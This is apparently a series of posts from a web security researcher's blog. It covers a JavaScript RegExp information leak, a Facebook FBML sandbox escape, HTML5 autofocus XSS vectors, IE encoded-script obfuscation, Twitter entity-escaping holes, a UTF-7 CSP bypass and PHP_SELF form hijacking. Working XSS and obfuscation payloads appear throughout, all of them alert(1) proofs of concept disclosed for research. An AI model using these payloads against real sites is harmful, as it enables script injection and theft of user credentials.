My RegExp is still leaking

The great thing about standards is that sometimes they are blindly followed and it’s not until maybe years down the line that you realise they got it wrong. Personally I think standards should be organically developed in code then defined in a standard once the various flaws have been ironed out. Every standard should use code samples for every single thing they define, this way it is quite easy to spot the intention and how to abuse it.

You could argue this is already done but I disagree, we should have standard prototypes with testing code for each then we can use the code samples and the specification. The W3 decided to release a security list which is a fantastic idea but why did we take so long?

Anyway things are changing and that is cool but onto my RegExp I think. Why the standards rant? Well the RegExp object was defined in the specification as a global object that can access the last result among other things of a regular expression literal. I have no idea why, the same result could be achieved using a reference to the regular expression like so:-

a=/a/;
a.test('a');
a.lastMatch;// This doesn't work
//RegExp.lastMatch this does work but shouldn't

So as you can see we can access the result of a expression even without reference to the variable. This is bad when we start mixing untrusted javascript in the future as we don’t want to expose other matches to different untrusted code. What new I hear you say? I posted about this before…well don’t you know that some browsers had the crazy idea of supporting regular expressions as a function, yeah true for some crazy reason rather than a regular expression being a regexp object it is a function! I would like for example the following code to return my user agent string please:-

javascript:alert(/.+/());

I’m not a crazy man honest :) Lets visit mmm apples and lets use Safari and type the string above in the url bar. What do we get? The user agent! If you look at the source code of the page, you’ll find that they use a external javascript file which runs a regexp match on the user agent because this is the lastMatch and we didn’t provide a string to the regexp in the function arguments it decides to return the lastMatch instead of the input we provide. Nice.

This works on Google Chrome too, you might get different results with Firefox if you have noscript installed because it runs RegExp matches on parts of the page.

The safety net

I was thinking about how to prevent a user being exploited lately by whatever method. One thing most attacks have in common is that a user generally needs to initiate the attack by clicking on a email or web site link from a social network. There’s a obvious pattern here. Granted some attacks are conducted on the application itself an XSS worm or network worm for example but these aren’t as common as the majority of attacks that require some form of initiation.

My solution? The safety net! When your average joe clicks on a link from twitter, they usually want to watch a funny video or something. Using this to it’s advantage the safety net detects when this happens, it is aware of the context of a email for example or that this particular social network is quite popular. When a user clicks a link from that context the browser doesn’t need to send any cookie related information from anywhere whilst in the “Safety net”.

It acts as a sandbox for the user protecting them from bad stuff, the user should be aware that they’re in it and should not be able to browse like normal unless they open a new window in the traditional means. It could also work for phishing, prompting the user not to enter any confidential information or maybe disabling form input completely except for whitelisted sources. Corporations could configure their safety net to be more restrictive, a policy for disabling javascript for example or maybe only allowing Flash to play video and not execute actionscript.

If anyone thinks this idea isn’t too crazy and decides to implement it here are a couple of suggestions I’ll refer to the Safety net as SN:-

1. Whilst in the SN any executed javascript or other code should always remain in the SN.
2. New windows or frames should not be allowed in the SN.
3. The browser should look different in the SN to inform the user that they are in a more restrictive browsing experience.
4. Closing the SN should be the only way out of it and the user must be clear that is what is happening.
5. Form input could be restricted in the SN.
6. Session data or cookies should not be transferred from/to the SN.
7. ANY form of download should not be permitted in the SN.
8. Third party plugins should only be allowed in restricted mode for example a PDF file should have a restricted mode which many features are disabled like javascript. Only if this mode is enabled would the PDF be allowed to execute.
9. Full screen mode should be prevented.
10. In the SN it is equivalent of opening the browser for the first time.

Additionally I suggest a meta tag to identify social networks:-

<meta name="identify" content="Social Network" />

Facebook sandbox escape

My friend mario (he who never blogs) found XSS in facebook a couple of times. This tempted me to look at their sandbox, I didn’t register for an account but just tried breaking their FBML console.

They have their own FBML (Facebook markup language) which is just a basic HTML/CSS and a separate Javascript sandbox which restricts what you can execute and access by scoping everything to the app ID. I didn’t need to break their Javascript sandbox as breaking the FBML would allow me to execute any code and accessing the document source etc.

I thought the best way to beat the sandbox would be through css expressions as they use the IE7 compat header. I tested their console a couple of times and in 10 minutes found that they fail to parse CSS comments correctly. Next followed incorrect html encoded quotes, so I had the right tools to break out of there but I need to execute Javascript. They allowed stuff like xpression() but I tried double encoding expression in various ways but they seemed to catch it ok. Then I checked their charset which I presumed they use UTF-8 which they do :) I used my old trick of placing a UTF-8 BOM character before the “e” in expression and boom I had a bypass. The first one didn’t work because the quote was in the wrong place but I knew a little modification it would work and the final vector is below:-

<div style=background-image:url('http://&quot;);xss/**/&#x3a;&#65279expression(alert(1));+&quot;')!important;></div>

Note the &#65278 needed to be the actual character in order to break the sandbox but the vector should execute as is anyway and it was easier to see this way. The !important part isn’t required but I just thought I’d assign priority :) The vector has now been fixed by Facebook.

Facebook vector

HTML5 new XSS vectors

So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now :) We have a brand new way of auto executing XSS.

Normally when you find a XSS hole within a input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)>

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating but I’m showing how IE accepts the language attribute and a labelled vbs statement to change the event to allow vbscript instead of javascript. Ok so lets play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call vbscript from javascript by using execScript and then look how we can execute from javascript to vbscript and then back to javascript again! So now we’re playing some ping pong but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah you can use VBScript.Encode and Javascript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same but it would be silly to finish now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but people don’t seem to get this when using data in certain context. If you are a dev please read this and read it until you understand it because if you misidentify context you fail and you fail pretty badly.

I reported this to twitter about two months ago, they responded and fixed four xss holes but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: ‘”<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(’ \&quot;\’xss’,'/search?q=&a…

Here they are escaping &quot; with \&quot; and ‘ with \’. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too &#39; &#x27; &#39 &#x27 so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix:-
Twitter poc (don’t tweet these results)

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.

Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now :)

So I figured how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with even in a correctly escaped JSON feed.

Utf-7 can be fully encoded meaning that you can conceal string characters and others. ‘ABC’ becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:-
[{'friend':'something',email:'something'} ]

If we can influence the “something” parts then we inject the feed with our data to bypass CSP:-
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:-
[{'friend':'luke','email':''}];alert(’May the force be with you’);[{'job':'done'}]

We then inject the data by referencing it using a script tag and a charset:-

"><script src="http://some.website/test.json" charset="utf-7"></script>

This successfully executes in CSP bypasing it’s restrictions because the code comes from the domain itself and doesn’t use in-line or attribute based XSS.

As always as demo is available here:-
CSP bypass

My RegExp is leaking

I discovered a long time ago that the Javascript specification actually encourages the global RegExp object to retain the properties from the last execution of the regular expression parser. This is quite funny and stupid because as we move forward and sites start to share the same Javascript space we will leak information that we don’t want to leak.

Don’t get me wrong this isn’t a huge issue, it’s just one of those little spec holes which we can exploit for Obfuscation or information leakage. Noscript or Firefox I’m not sure which seems to leak the last RegExp execution when called from a event. An example of this can be viewed here:-

Regexp leak

So when you click the link, the URL is actually built from Noscripts scan of the URL using the following code:-

alert(RegExp['$`']+RegExp['$&']+RegExp['$\''])

This could be used for hiding a XSS payload or something, like I said not really that serious…okay onto obfuscation. We can use leftContext etc as a variable to eval and execute code based on the RegExp matches like so:-

/\\u0024/.test('\x61\x6c\x65\x72\x74\x28\x31\x29\x24');
eval(RegExp['$`'])

So the pattern finds \$ within the text alert(1)$ and returns the leftContext (RegExp['$`']) which is alert(1) and executes the code.

And finally I’ll leave you with some bonus obfuscation:-

eval('a'.replace(/(.+)/,'$1l').replace(/(.+)/,'$1e').replace(/(.+)/,'$1r').replace(/(.+)/,'$1t').replace(/(.+)/,'$1(').replace(/(.+)/,'$11').replace(/(.+)/,'$1)'))
eval('342342ale'.replace(/\d+/,'$`')+'rt23879'.replace(/\d+/,'$\'')+'abcdefggi(1)'.replace(/.+(\([1]\))/,'$+'))

PHP self return of the slash

Not posted for a while because I couldn’t think of anything interesting to say but I thought about something I found ages ago in PHP4 and it’s been long enough now. This is also quite funny because my server is vulnerable to this (that’s what I get for crappy hosting).

So what happens if you escape PHP_SELF with htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES)? Safe from XSS? I hope so. Safe from everything? Well not really or at least it didn’t used to be. You see PHP does some crazy things with the URL and it’s possible to change a form target to an external URL without using any unsafe characters. Take the following example:-

Login form

This form simulates some web application login and uses PHP_SELF to output the URL because for some reason the developer doesn’t want to type “login.php” or use __FILE___. The URL is escaped from XSS but we can change the form target by simply supplying slashes :) e.g.

Sending Google your password So the user enters their username and password combination and thinks that they are logging on to the target application in reality you are sending the details to a evil site.

I checked PHP5 and it seemed ok but this will serve as a reminder that the slash can get you.

Javascript compression with unicode characters

For some random reason I was making a base999 number compression function, I think it was because someone posted on sla.ckers about base 62. I wanted to see how far I could compress the numbers using a higher range of characters, then it hit me. Why not use it for js compression :)

You see if you convert the characters to their character code number and then extract a section of the number and convert it to a unicode character you can drastically reduce the amount of characters, provided of course your code contains enough characters as a decompression function is required.

I’ve added the three tag to Hackvertor to demo the compression. Here is a sample of code:-

eval("◮ᾥѵ٨ፍ".replace(/[^\s]/g,function(c){return c.charCodeAt()}).replace(/[3][2-9]|[4-9][0-9]|[1][0-1][0-9]|[1][2][0-6]/g,function(d){return String.fromCharCode(d)}))

The unpacking function simply gets the character codes, then the very specific regexp finds a range of characters from !-~ based on the character code number. This is because I only have one long number and they are not separated. I leave spaces intact because they don’t fall between the ranges and also it can break syntax if they are missing a semi-colon. It’s possible to reduce it further by including these characters.

So if you want to have some fun, try reducing the amount of characters compressed and see if you can create a smaller decompression function. Below is an example of the jspack tag in action:-
JS pack

Update…

Ok as Andrea pointed out this isn’t actual compression however many systems including twitter think the unicode characters are actually only 1 byte which results in longer message. So you can compress a 280 character message into 140. Sirdarckcat manage to get it down to the 50% ratio, you can send encoded twitter messages with Hackvertor. Like this:-

Encoded twitter message